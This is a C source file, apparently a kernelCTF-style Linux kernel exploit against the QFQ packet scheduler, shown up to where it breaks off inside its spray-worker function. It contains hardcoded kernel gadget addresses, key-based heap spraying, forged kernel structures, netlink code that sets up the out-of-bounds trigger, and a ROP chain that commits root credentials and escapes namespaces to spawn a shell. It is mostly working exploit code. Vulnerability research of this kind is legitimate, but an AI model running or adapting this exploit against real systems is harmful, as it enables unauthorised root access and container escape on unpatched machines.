#define _GNU_SOURCE
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <arpa/inet.h>
#include <sched.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <linux/keyctl.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/pkt_sched.h>
#include <linux/if_packet.h>
#include <linux/pkt_cls.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <signal.h>
#include <netinet/in.h>

typedef unsigned char u8;
typedef unsigned short u16;
typedef unsigned int u32;
typedef unsigned long long u64;
typedef char i8;
typedef short i16;
typedef int i32;
typedef long long i64;

_Static_assert (sizeof(u8) == 1, "sizeof(u8) != 1");
_Static_assert (sizeof(u16) == 2, "sizeof(u16) != 2");
_Static_assert (sizeof(u32) == 4, "sizeof(u32) != 4");
_Static_assert (sizeof(u64) == 8, "sizeof(u64) != 8");
_Static_assert (sizeof(i8) == 1, "sizeof(i8) != 1");
_Static_assert (sizeof(i16) == 2, "sizeof(i16) != 2");
_Static_assert (sizeof(i32) == 4, "sizeof(i32) != 4");
_Static_assert (sizeof(i64) == 8, "sizeof(i64) != 8");

#define L(fmt, ...) printf("INFO: " fmt "\n", ##__VA_ARGS__)
#define E(fmt, ...) printf("ERROR: " fmt "\n", ##__VA_ARGS__)

#define FAIL_IF(x) if ((x)) { \
    perror(#x); \
    return -1; \
}

#define pad4(x) (u8)x, (u8)x, (u8)x, (u8)x
#define pad8(x) pad4(x), pad4(x)

#define p64(x) (u8)(((x) >> 0) & 0xFF), \
    (u8)(((u64)(x) >> 8) & 0xFF), \
    (u8)(((u64)(x) >> 16) & 0xFF), \
    (u8)(((u64)(x) >> 24) & 0xFF), \
    (u8)(((u64)(x) >> 32) & 0xFF), \
    (u8)(((u64)(x) >> 40) & 0xFF), \
    (u8)(((u64)(x) >> 48) & 0xFF), \
    (u8)(((u64)(x) >> 56) & 0xFF)

#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0]))

#define PACK __attribute__((__packed__))

#define __EVENT_SET 0
#define __EVENT_UNSET 1

#define EVENT_DEFINE(name, init) volatile int name = init
#define EVENT_WAIT(name) while (__atomic_exchange_n(&name, __EVENT_UNSET, __ATOMIC_ACQUIRE) != __EVENT_SET) { usleep(1000); }

#define EVENT_UNSET(name) __atomic_store_n(&name, __EVENT_UNSET, __ATOMIC_RELEASE)
#define EVENT_SET(name) __atomic_store_n(&name, __EVENT_SET, __ATOMIC_RELEASE)

// GADGETS {

u64 cls_rsvp_ops = 0xffffffff8395e320;

u64 find_task_by_vpid = 0xffffffff811b5670;
u64 switch_task_namespaces = 0xffffffff811bd1f0;
u64 commit_creds = 0xffffffff811bed80;
u64 prepare_kernel_cred = 0xffffffff811bf020;
u64 init_task = 0xffffffff83615a40;
u64 init_nsproxy = 0xffffffff836765c0;

u64 ___trampoline_start_iretq = 0xffffffff822010c6;

u64 mov_rdi_rax = 0xffffffff810eb083; // mov rdi, rax; mov rax, rdx; xor edx, edx; div rcx; mov rdx, [rip+0x315da13]; add rax, rdi; jmp zen_untrain_ret+1 (0xffffffff82404440) {taken}; ret // 4889c74889d031d248f7f1488b1513da15034801f8e9c3223c01c3
u64 pop_rcx_ret = 0xffffffff810271ec; // pop rcx; ret // 59c3
u64 pop_rsi = 0xffffffff8100256c; // pop rsi; jmp zen_untrain_ret+1 (0xffffffff82404440) {taken}; ret // 5ee9ce1e4001c3
u64 pop_rdi = 0xffffffff81002cd5; // pop rdi; jmp zen_untrain_ret+1 (0xffffffff82404440) {taken}; ret // 5fe97e094001c3

u64 mov_rax_rdi_jmp_zen_ret = 0xffffffff810fdd45; // mov rax, rdi; jmp zen_untrain_ret+1 (0xffffffff82404440) {taken}; ret // 4889f8e991414001c3

u64 push_rsi_jmp_rsi_0x39 = 0xffffffff8198915b; // push rsi; jmp qword ptr [rsi+0x39] {taken} // 56ff6639
u64 pop_rsp_add_rsp_0x18_pop_rbx_pop_rbp_pop_r12_jmp_zen_ret = 0xffffffff810e8603; // pop rsp; add rsp, 0x18; pop rbx; pop rbp; pop r12; jmp zen_untrain_ret+1 (0xffffffff82404440) {taken}; ret // 5c4883c4185b5d415ce94f4d3c01c3
u64 mov_rsp_rbp_pop_rbp_ret = 0xffffffff8112cf2c; // mov rsp, rbp; pop rbp; ret // 4889ec5dc3

// } GADGETS

#define FOR_ALL_OFFSETS(x) do { \
    x(cls_rsvp_ops); \
    x(find_task_by_vpid); \
    x(switch_task_namespaces); \
    x(commit_creds); \
    x(prepare_kernel_cred); \
    x(init_task); \
    x(init_nsproxy); \
    x(___trampoline_start_iretq); \
    x(mov_rdi_rax); \
    x(pop_rcx_ret); \
    x(pop_rsi); \
    x(pop_rdi); \
    x(mov_rax_rdi_jmp_zen_ret); \
    x(push_rsi_jmp_rsi_0x39); \
    x(pop_rsp_add_rsp_0x18_pop_rbx_pop_rbp_pop_r12_jmp_zen_ret); \
    x(mov_rsp_rbp_pop_rbp_ret); \
  } while(0)

// Reverse calculation of the index in sch_qfq.c:qfq_calc_index
// Our desired index will be 27 so that the fake group resides at offset 288 into
// our large spray object.
#define _TARGET_INDEX 27
#define _MIN_SLOT_SHIFT 25
#define _NUM_CLS 1
#define _CLS_WEIGHT 1
#define _ONE_FP 0x40000000
#define LMAX ((1ull << (_TARGET_INDEX + _MIN_SLOT_SHIFT - 1 + 1)) / (_ONE_FP / (_CLS_WEIGHT * _NUM_CLS)) / _NUM_CLS)

#define SPRAY_8192 1
#define SPRAY_128 2

#define SIZEOF_USER_KEY_PAYLOAD 24

struct list_head {
  struct list_head *         next;                 /*     0     8 */
  struct list_head *         prev;                 /*     8     8 */

  /* size: 16, cachelines: 1, members: 2 */
  /* last cacheline: 16 bytes */
};

struct hlist_node {
  struct hlist_node *        next;                 /*     0     8 */
  struct hlist_node * *      pprev;                /*     8     8 */

  /* size: 16, cachelines: 1, members: 2 */
  /* last cacheline: 16 bytes */
};

struct qfq_aggregate_partial {
  // struct hlist_node          next;                 /*     0    16 */
  // u64                        S;                    /*    16     8 */
  u64                        F;                    /*    24     8 */
  struct qfq_group *         grp;                  /*    32     8 */
  u32                        class_weight;         /*    40     4 */
  int                        lmax;                 /*    44     4 */
  u32                        inv_w;                /*    48     4 */
  u32                        budgetmax;            /*    52     4 */
  u32                        initial_budget;       /*    56     4 */
  u32                        budget;               /*    60     4 */
  /* --- cacheline 1 boundary (64 bytes) --- */
  int                        num_classes;          /*    64     4 */

  u8 __pad0[4]; /* XXX 4 bytes hole, try to pack */

  struct list_head           active;               /*    72    16 */
  struct hlist_node          nonfull_next;         /*    88    16 */

  /* size: 104, cachelines: 2, members: 13 */
  /* sum members: 100, holes: 1, sum holes: 4 */
  /* last cacheline: 40 bytes */
} PACK;
_Static_assert(sizeof(struct qfq_aggregate_partial) == 104 - SIZEOF_USER_KEY_PAYLOAD);

struct tcf_proto_partial {
  // void*         next;                 /*     0     8 */
  // void *                     root;                 /*     8     8 */
  // int                        (*classify)(struct sk_buff *, const struct tcf_proto  *, struct tcf_result *); /*    16     8 */
  u16                     protocol;             /*    24     2 */

  /* XXX 2 bytes hole, try to pack */
  u8 __pad0[2];

  u32                        prio;                 /*    28     4 */
  void *                     data;                 /*    32     8 */
  const void  * ops;               /*    40     8 */
  struct tcf_chain *         chain;                /*    48     8 */
  u32                 lock;                 /*    56     4 */
  u8                       deleting;             /*    60     1 */

  /* XXX 3 bytes hole, try to pack */
  u8 __pad1[3];

  /* --- cacheline 1 boundary (64 bytes) --- */
  u32                 refcnt;               /*    64     4 */

  /* XXX 4 bytes hole, try to pack */
  u8 __pad2[4];

  u8       rcu[16];
  struct hlist_node          destroy_ht_node;      /*    88    16 */

  /* size: 104, cachelines: 2, members: 13 */
  /* sum members: 95, holes: 3, sum holes: 9 */
  /* forced alignments: 1, forced holes: 1, sum forced holes: 4 */
  /* last cacheline: 40 bytes */
} PACK;
_Static_assert(sizeof(struct tcf_proto_partial) == 104 - SIZEOF_USER_KEY_PAYLOAD);


struct tcf_proto_ops {
  struct list_head           head;                 /*     0    16 */
  char                       kind[16];             /*    16    16 */
  int                        (*classify)(void*, const void*, void*); /*    32     8 */
  int                        (*init)(void*); /*    40     8 */
  void                       (*destroy)(void*, u8, void*); /*    48     8 */
  void *                     (*get)(void*, u32); /*    56     8 */
  /* --- cacheline 1 boundary (64 bytes) --- */
  void                       (*put)(void*, void *); /*    64     8 */
  int                        (*change)(void*, void*, void*, long unsigned int, u32, void**, void **, u32, void*); /*    72     8 */
  int                        (*delete)(void*, void*, u8*, u8, void*); /*    80     8 */
  u8                       (*delete_empty)(void*); /*    88     8 */
  void                       (*walk)(void*, void*, u8); /*    96     8 */
  int                        (*reoffload)(void*, u8, void *, void *, void*); /*   104     8 */
  void                       (*hw_add)(void*, void *); /*   112     8 */
  void                       (*hw_del)(void*, void *); /*   120     8 */
  /* --- cacheline 2 boundary (128 bytes) --- */
  void                       (*bind_class)(void *, u32, long unsigned int, void *, long unsigned int); /*   128     8 */
  void *                     (*tmplt_create)(void*, void*, void**, void*); /*   136     8 */
  void                       (*tmplt_destroy)(void *); /*   144     8 */
  int                        (*dump)(void*, void*, void *, void*, void*, u8); /*   152     8 */
  int                        (*terse_dump)(void*, void*, void *, void*, void*, u8); /*   160     8 */
  int                        (*tmplt_dump)(void*, void*, void *); /*   168     8 */
  struct module *            owner;                /*   176     8 */
  int                        flags;                /*   184     4 */

  /* size: 192, cachelines: 3, members: 22 */
  /* padding: 4 */
} PACK;

struct hlist_head {
  struct hlist_node *        first;                /*     0     8 */

  /* size: 8, cachelines: 1, members: 1 */
  /* last cacheline: 8 bytes */
};

struct qfq_group {
  u64                        S;                    /*     0     8 */
  u64                        F;                    /*     8     8 */
  unsigned int               slot_shift;           /*    16     4 */
  unsigned int               index;                /*    20     4 */
  unsigned int               front;                /*    24     4 */

  u8 __pad0[4]; /* XXX 4 bytes hole, try to pack */

  long unsigned int          full_slots;           /*    32     8 */
  struct hlist_head          slots[32];            /*    40   256 */

  /* size: 296, cachelines: 5, members: 7 */
  /* sum members: 292, holes: 1, sum holes: 4 */
  /* last cacheline: 40 bytes */
} PACK;

typedef i32 key_serial_t;

struct key {
  key_serial_t id;
  int type;
};

long keyctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5);

struct rop_payload_head {
  struct tcf_proto_ops ops;
  u8 stack[0];
} PACK;

// Large spray payload (kmalloc-8192)
// This will host the fake qfq_group object in stage 1
// Eventually it will contain both the prepared stack and the tcf_proto_ops
// which the fake tcf_proto will reference
struct key_payload_large {
  struct {
    u8 __pad02[288 - SIZEOF_USER_KEY_PAYLOAD];
    struct qfq_group group;
  } PACK;
  struct rop_payload_head rop;
  u8 __pad2[4097 - sizeof(struct qfq_group) - 288 - sizeof(struct rop_payload_head)];
} PACK;
_Static_assert(sizeof(struct key_payload_large) == 4097 - SIZEOF_USER_KEY_PAYLOAD);
_Static_assert(__builtin_offsetof(struct key_payload_large, group) == 0x108);

// Small spray payload (104 bytes)
// Used for fake qfq_aggregate as well as fake tcf_proto
// In the case of tcf_proto, we overlay the structure with
// a temporary stack from which we will eventually pivot into
// the larger stack prepared in the larger payload.
// The stack is carefully crafted to not interfere with the rest
// of the structure.
struct key_payload_small {
  union {
    struct qfq_aggregate_partial agg;
    union {
      struct tcf_proto_partial tp;
      struct {
        // payload for pop rsp; add rsp, 0x18; pop rbx; pop rbp; pop r12; ret
        u8 __pad0[0x18 - SIZEOF_USER_KEY_PAYLOAD];
        u64 scratch_rbx;
        u64 rbp;
        u64 scratch_r12;
        u64 stack[1];
      } PACK;
      struct {
        // payload for push rsi; jmp qword ptr [rsi+0x39]
        u8 __pad1[0x39 - SIZEOF_USER_KEY_PAYLOAD];
        u64 jmp_target;
      } PACK;
    };
  };
} PACK;
_Static_assert(sizeof(struct key_payload_small) == 104 - SIZEOF_USER_KEY_PAYLOAD);

// key_ctl will be a bit sketchy because of our multi - process exploit.
// These functions will proxy calls through to a child process which possesses
// all the keys.
int spray(int type, int n, void* payload, size_t plen);
int spray_reset();
int spray_reset_except(struct key* ids, size_t num_ids);
int spray_exit();

const struct key* get_key(unsigned index);

static int _pin_to_cpu(int id) {
  cpu_set_t set;
  CPU_ZERO(&set);
  CPU_SET(id, &set);
  return sched_setaffinity(getpid(), sizeof(set), &set);
}

int final_stage_pid = 0;
void* final_stage_stack = NULL;

static struct key_payload_small agg; // SPRAY_128
static struct key_payload_large large; // SPRAY_8192
static key_serial_t id_agg;
static key_serial_t id_large;

static u64 leak_agg_ptr = 0;
static u64 leak_grp_ptr = 0;
static u64 leak_cls_rsvp_ops = 0;

static u8* rop_payload = NULL;
static u32 rop_payload_size = 0;

static u8* scratch_buf = NULL;

#ifndef DO_BEFORE
#define DO_BEFORE 1
#endif

#ifndef ATTEMPT_LARGE_EVERY
#define ATTEMPT_LARGE_EVERY 17
#endif
#ifndef ATTEMPT_SMALL_EVERY
#define ATTEMPT_SMALL_EVERY 27
#endif

static char* shell_argv[] = {
    "/bin/sh",
    "-c",
    "/bin/cat /flag && /bin/sh",
    NULL,
};

void shell() {
  L("escape ..");
  setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
  setns(open("/proc/1/ns/pid", O_RDONLY), 0);
  setns(open("/proc/1/ns/net", O_RDONLY), 0);

  L("spawning shell ..");
  execve(shell_argv[0], shell_argv, NULL);
  exit(1);
}

void prep_agg_payload(struct qfq_aggregate_partial* agg, u64 marker, u32 lmax) {
  memset(agg, 0, sizeof(*agg));

  agg->F = marker; // marker, dont-care
  agg->grp = NULL;
  agg->class_weight = 1;
  agg->lmax = lmax;
  agg->inv_w = 0; // dont-care
  agg->budgetmax = 0; // dont-care
  agg->initial_budget = 0; // dont-care
  agg->budget = 0; // dont-care
  agg->num_classes = 0; // so that we will free this on class deletion

  // iff we add a new class for this fake agg, keeping this NULL should be fine.
  // otherwise we would have to pass the following in qfq_add_to_agg:
  //
  // if (cl->qdisc->q.qlen > 0) { /* adding an active class */
  //   list_add_tail(&cl->alist, &agg->active);
  //   if (list_first_entry(&agg->active, struct qfq_class, alist) ==
  //       cl && q->in_serv_agg != agg) /* agg was inactive */
  //     qfq_activate_agg(q, agg, enqueue); /* schedule agg */
  // }
  //
  // this seems complicated, so we just avoid it.
  agg->active.next = NULL;
  agg->active.prev = NULL;

  // this should be the first agg in list, thus keeping those NULL should be fine.
  // we need to pass this list op in qfq_find_agg:
  //
  // hlist_for_each_entry(agg, &q->nonfull_aggs, nonfull_next)
  //    if (agg->lmax == lmax && agg->class_weight == weight)
  //        return agg;
  //
  agg->nonfull_next.next = NULL;
  agg->nonfull_next.pprev = NULL;
}

void prep_tcf_proto_payload(struct key_payload_small* p) {
  memset(p, 0, sizeof(*p));

  p->tp.protocol = 0xdead;
  p->tp.prio = 0x22220000;
  p->tp.ops = (void*)(leak_grp_ptr + __builtin_offsetof(struct key_payload_large, rop.ops) + SIZEOF_USER_KEY_PAYLOAD);

  // interleaved stack, pivot to larger stack in 8192 buffer
  p->rbp = (leak_grp_ptr + __builtin_offsetof(struct key_payload_large, rop.stack) + SIZEOF_USER_KEY_PAYLOAD);
  p->stack[0] = mov_rsp_rbp_pop_rbp_ret;

  // first pivot to the interleaved stack
  p->jmp_target = pop_rsp_add_rsp_0x18_pop_rbx_pop_rbp_pop_r12_jmp_zen_ret;

  // This refcount is on top of one of our gadgets. It will be incremented on trigger
  p->tp.refcnt -= 1;
}

void prep_stage1_large_payload(struct key_payload_large* large) {
  memset(large, 0, sizeof(*large));

  // This index will control the bit we flip.
  // (offsetof(struct qfq_sch, nonfull_aggs) - offsetof(struct qfq_sch, bitmaps)) * 8 + (FFS(0x80) = 7)
  large->group.index = 7440 * 8 + 7;
}

void prep_final_large_payload(struct key_payload_large* large) {
  memset(large, 0, sizeof(*large));

  u64 cs;
  u64 ss;
  asm(
    "movq %%cs, %0;"
    "movq %%ss, %1;"
    : "=r"(cs), "=r"(ss)
  );

  u8 rop[] = {
    pad8('R'), // rbp
    p64(pop_rdi),
    p64(init_task),
    p64(prepare_kernel_cred),
    p64(pop_rcx_ret),
    pad8('C'), // this is just to make sure that the div does not raise exception
    p64(mov_rdi_rax),
    p64(commit_creds),

    p64(pop_rdi),
    p64(1),
    p64(find_task_by_vpid),
    p64(pop_rcx_ret),
    pad8('C'), // this is just to make sure that the div does not raise exception
    p64(mov_rdi_rax),
    p64(pop_rsi),
    p64(init_nsproxy),
    p64(switch_task_namespaces),

    p64(___trampoline_start_iretq),

    pad8('A'), // rax;
    pad8('I'), // rdi;

    p64((u64)&shell),
    p64(cs),
    p64(0), // flags
    p64((u64)(scratch_buf + 0x4000)), // rsp
    p64(ss),
  };

  strcpy(large->rop.ops.kind, "exploit");
  large->rop.ops.get = (void*)mov_rax_rdi_jmp_zen_ret;
  large->rop.ops.dump = (void*)push_rsi_jmp_rsi_0x39;

  memcpy(large->rop.stack, rop, sizeof(rop));
}

int read_key(key_serial_t id, void* buf, u32 buflen) {
  if (scratch_buf == NULL) {
    return -1;
  }

  int keylen = keyctl(KEYCTL_READ, id, (unsigned long)scratch_buf, 0x10000, 0);
  if (keylen < 0) {
    return keylen;
  }

  memcpy(buf, scratch_buf, buflen < keylen ? buflen : keylen);

  return keylen;
}

static int last_worker = 0;
static struct {
    int pid;
    void* stack;
} workers[200] = {0};

int spawn_worker(int (*target)(void*), void* arg) {
  void* stack = workers[last_worker].stack;

  if (stack == NULL) {
    stack = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
    FAIL_IF(stack == MAP_FAILED);
    workers[last_worker].stack = stack;
  }

  int child = clone(target, stack + 0x4000, CLONE_NEWUSER | CLONE_NEWNET | CLONE_VM, arg);

  if (child < 0) {
    return -1;
  }

  workers[last_worker].pid = child;
  last_worker++;

  return last_worker - 1;
}

int kill_worker(int index) {
  if (workers[index].pid > 0) {
    kill(workers[index].pid, SIGKILL);
    workers[index].pid = -1;

    if (index == last_worker - 1) {
      last_worker--;
    }

    return 0;
  }

  E("worker %d does not exist?", index);
  return -1;
}

int netlink_errno(int fd, struct nlmsghdr* nlh) {
  assert(nlh->nlmsg_type == NLMSG_ERROR);
  struct nlmsgerr* e = NLMSG_DATA(nlh);
  assert(nlh->nlmsg_len >= NLMSG_HDRLEN + NLMSG_ALIGN(sizeof(*e)));

  if (e->error != 0) {
    E("netlink error: %d", e->error);
    errno = -e->error;
  }

  return e->error;
}

int netlink_send_recv(int fd, void* buf, int size) {
  struct iovec iov = {
    .iov_base = buf,
    .iov_len = size,
  };
  struct msghdr msg = {
    .msg_name = NULL,
    .msg_namelen = 0,
    .msg_iov = &iov,
    .msg_iovlen = 1,
    .msg_control = NULL,
    .msg_controllen = 0,
    .msg_flags = 0,
  };
  if (sendmsg(fd, &msg, 0) < 0) {
    perror("sendmsg()");
    return -1;
  }

  msg.msg_flags = MSG_TRUNC;
  msg.msg_iov = NULL;
  msg.msg_iovlen = 0;
  iov.iov_len = recvmsg(fd, &msg, MSG_PEEK | MSG_TRUNC);
  if (iov.iov_len < 0) {
    perror("recvmsg()");
    return -1;
  }
  msg.msg_iov = &iov;
  msg.msg_iovlen = 1;
  return recvmsg(fd, &msg, 0);
}

volatile int wake = 0;
volatile int done = 0;
// event which will be set whenever control is handed over back to main
static EVENT_DEFINE(parent_notify, __EVENT_UNSET);
// event which will be set whenever control is handed over back to the final stage worker
static EVENT_DEFINE(final_worker_notify, __EVENT_UNSET);

int prepare_device(int s, int ifindex) {
  struct nlmsghdr* nlh = calloc(1, 4096);
  FAIL_IF(nlh == NULL);

  struct ifinfomsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_NEWLINK;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  // Up the device
  data->ifi_family = PF_UNSPEC;
  data->ifi_type = 0;
  data->ifi_index = ifindex;
  data->ifi_flags = IFF_UP;
  data->ifi_change = 1;

  struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data));
  attr->nla_type = IFLA_MTU;
  attr->nla_len = NLA_HDRLEN + 4;
  u32* attr_data = (void*)attr + NLA_HDRLEN;
  *attr_data = 0x1000;

  nlh->nlmsg_len += attr->nla_len;

  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  if (netlink_errno(s, nlh) != 0) {
    E("failed to prepare device!");
    free(nlh);
    return -1;
  }

  free(nlh);
  return 0;
}

// Create a rsvp tcfilter, used to spray our tcf_proto object
int create_tcfilter(int s, int ifindex, u32 parent, u16 prio) {
  struct nlmsghdr* nlh = calloc(1, 4096);
  struct tcmsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_NEWTFILTER;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  data->tcm_family = PF_UNSPEC;
  data->tcm_ifindex = ifindex;
  data->tcm_parent = parent;
  data->tcm_handle = 0;

  u16 protocol = 8;
  data->tcm_info = ((u32)prio << 16) | (u32)protocol;

  struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data));
  do {
    attr->nla_type = TCA_KIND;
    attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("rsvp") + 1);

    char* attr_data = (char*)attr + NLA_HDRLEN;
    strcpy(attr_data, "rsvp");

    nlh->nlmsg_len += attr->nla_len;
    attr = (void*)attr + attr->nla_len;
  } while (0);

  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  int err = netlink_errno(s, nlh);

  // This sometimes shows EBUSY, but it still works?
  // We just ignore the error, ...
  if (err != -EBUSY && err != 0) {
    E("failed to create tcfilter!");
    free(nlh);
    return -1;
  }

  free(nlh);
  return 0;
}

// Create a netem qdisc with a large delay, used to slow down the enqueue / dequeue logic
int create_netem_qdisc(int s, int ifindex, u32 parent, u32 handle) {
  struct nlmsghdr* nlh = calloc(2, 8192);
  struct tcmsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_NEWQDISC;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  data->tcm_family = PF_UNSPEC;
  data->tcm_ifindex = ifindex;
  data->tcm_parent = parent;
  data->tcm_handle = handle & 0xFFFF0000;

  struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data));
  do {
    attr->nla_type = TCA_KIND;
    attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("netem") + 1);

    char* attr_data = (char*)attr + NLA_HDRLEN;
    strcpy(attr_data, "netem");

    nlh->nlmsg_len += attr->nla_len;
    attr = (void*)attr + attr->nla_len;

    attr->nla_type = TCA_OPTIONS;
    attr->nla_len = NLA_HDRLEN + sizeof(struct tc_netem_qopt);

    struct tc_netem_qopt* netem_qopt = (void*)attr + NLA_HDRLEN;
    netem_qopt->latency = 1000u * 1000 * 5000; // latency in us
    // this limit is important:
    // we want the first packet to be delayed indefinitely, but
    // the second packet, which triggers the vuln, to be dropped.
    netem_qopt->limit = 1;

    nlh->nlmsg_len += attr->nla_len;
    attr = (void*)attr + attr->nla_len;
  } while (0);

  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  if (netlink_errno(s, nlh) != 0) {
    E("failed to create netem qdisc!");
    free(nlh);
    return -1;
  }

  free(nlh);
  return 0;
}

// Create a qfq qdisc, main qdisc of interest
int create_qfq_qisc(int s, int ifindex, u32 parent, u32 handle, int with_stab) {
  struct nlmsghdr* nlh = calloc(1, 4096);

  struct tcmsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_NEWQDISC;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  data->tcm_family = PF_UNSPEC;
  data->tcm_ifindex = ifindex;
  data->tcm_parent = TC_H_ROOT;
  data->tcm_handle = handle & 0xFFFF0000;

  struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data));

  do {
    attr->nla_type = TCA_KIND;
    attr->nla_len = NLA_HDRLEN + NLA_ALIGN(strlen("qfq") + 1);

    char* attr_data = (char*)attr + NLA_HDRLEN;
    strcpy(attr_data, "qfq");

    nlh->nlmsg_len += attr->nla_len;
    attr = (void*)attr + attr->nla_len;

    if (with_stab) {
      // Prepare the sizetable. This sizetable is used to trigger
      // the vulnerability.
      // Essentially we setup a lookup table where the resulting
      // packet size equals to (table[in_size >> 9] << 7)
      // We choose those bitshifts to have some room for packet headers
      // that we do not have to care about.
      attr->nla_type = TCA_STAB;
      attr->nla_len = NLA_HDRLEN;

      struct nlattr* nested = (void*)attr + NLA_HDRLEN;
      nested->nla_type = TCA_STAB_BASE;
      nested->nla_len = NLA_HDRLEN + sizeof(struct tc_sizespec);
      attr->nla_len += nested->nla_len;

      struct tc_sizespec* sizespec = (void*)nested + NLA_HDRLEN;
      sizespec->cell_log = 9;
      sizespec->size_log = 7;
      sizespec->cell_align = 0;
      sizespec->overhead = 0;
      sizespec->linklayer = 0;
      sizespec->mpu = 0;
      sizespec->mtu = 0;
      sizespec->tsize = 2;

      nested = (void*)nested + nested->nla_len;
      nested->nla_type = TCA_STAB_DATA;
      nested->nla_len = NLA_HDRLEN + 2 * sizeof(u16);
      attr->nla_len += nested->nla_len;

      *((u16*)((void*)nested + NLA_HDRLEN) + 0) = 0;
      // This is the size that triggers the vulnerability
      *((u16*)((void*)nested + NLA_HDRLEN) + 1) = LMAX >> 7;

      nlh->nlmsg_len += attr->nla_len;
      attr = (void*)attr + attr->nla_len;
    }
  } while (0);

  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  if (netlink_errno(s, nlh) != 0) {
    E("failed to create qfq qdisc!");
    free(nlh);
    return -1;
  }

free(nlh);
return 0;
}

// Delete a class from a qdisc
int delete_class(int s, int ifindex, u32 handle) {
  L("deleting class %x", handle);

  struct nlmsghdr* nlh = calloc(1, 4096);
  struct tcmsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_DELTCLASS;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  data->tcm_family = PF_UNSPEC;
  data->tcm_ifindex = ifindex;
  data->tcm_parent = TC_H_ROOT;
  data->tcm_handle = handle;

  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  if (netlink_errno(s, nlh) != 0) {
    E("failed to delete class!");
    free(nlh);
    return -1;
  }

  free(nlh);
  return 0;
}

// Add a helper class to a qdisc
int create_helper_class(int s, int ifindex, u32 class_handle, u32 sub_qdisc_handle, u32 lmax) {
  struct nlmsghdr* nlh = calloc(1, 4096);

  struct tcmsg* data = NLMSG_DATA(nlh);
  nlh->nlmsg_len = sizeof(*data) + NLMSG_HDRLEN;
  nlh->nlmsg_type = RTM_NEWTCLASS;
  nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE;
  nlh->nlmsg_seq = 0;
  nlh->nlmsg_pid = 0;

  data->tcm_family = PF_UNSPEC;
  data->tcm_ifindex = ifindex;
  data->tcm_parent = TC_H_ROOT;
  data->tcm_handle = class_handle;


  struct nlattr* attr = NLMSG_DATA(nlh) + NLMSG_ALIGN(sizeof(*data));
  struct nlattr* nested;

  do {
    attr->nla_type = TCA_OPTIONS;
    attr->nla_len = NLA_HDRLEN + NLA_HDRLEN + sizeof(u32);

    nested = (void*)attr + NLA_HDRLEN;
    nested->nla_type = TCA_QFQ_LMAX;
    nested->nla_len = NLA_HDRLEN + sizeof(u32);
    *(u32*)((void*)nested + NLA_HDRLEN) = lmax;

    nlh->nlmsg_len += attr->nla_len;
    attr = (void*)attr + attr->nla_len;
  } while (0);

  int recvlen = netlink_send_recv(s, nlh, nlh->nlmsg_len);
  if (recvlen < 0) {
    perror("recv()");
    free(nlh);
    return -1;
  }

  if (netlink_errno(s, nlh) != 0) {
    E("failed to create helper class!");
    free(nlh);
    return -1;
  }
  free(nlh);

  if (sub_qdisc_handle != 0) {
    return create_netem_qdisc(s, ifindex, class_handle, sub_qdisc_handle);
  }

  return 0;
}


// Worker to spray qdiscs and potentially trigger the vulnerabilty.
// Each worker will have its own network namespace and create qdiscs
// for the loopback device.
// We could create virtual devices, but here we are.
int bug_worker(void* arg) {
  int i = *(int*)arg;

  const u32 handle = 0x10000000 | (i << 16);
  const u32 handle_oob = handle | (1 << 0);
  const u32 handle_help = handle | (1 << 1);
  const u32 handle_faked1 = handle | (1 << 2);

  const u32 sub_handle_help = 0x20010000;
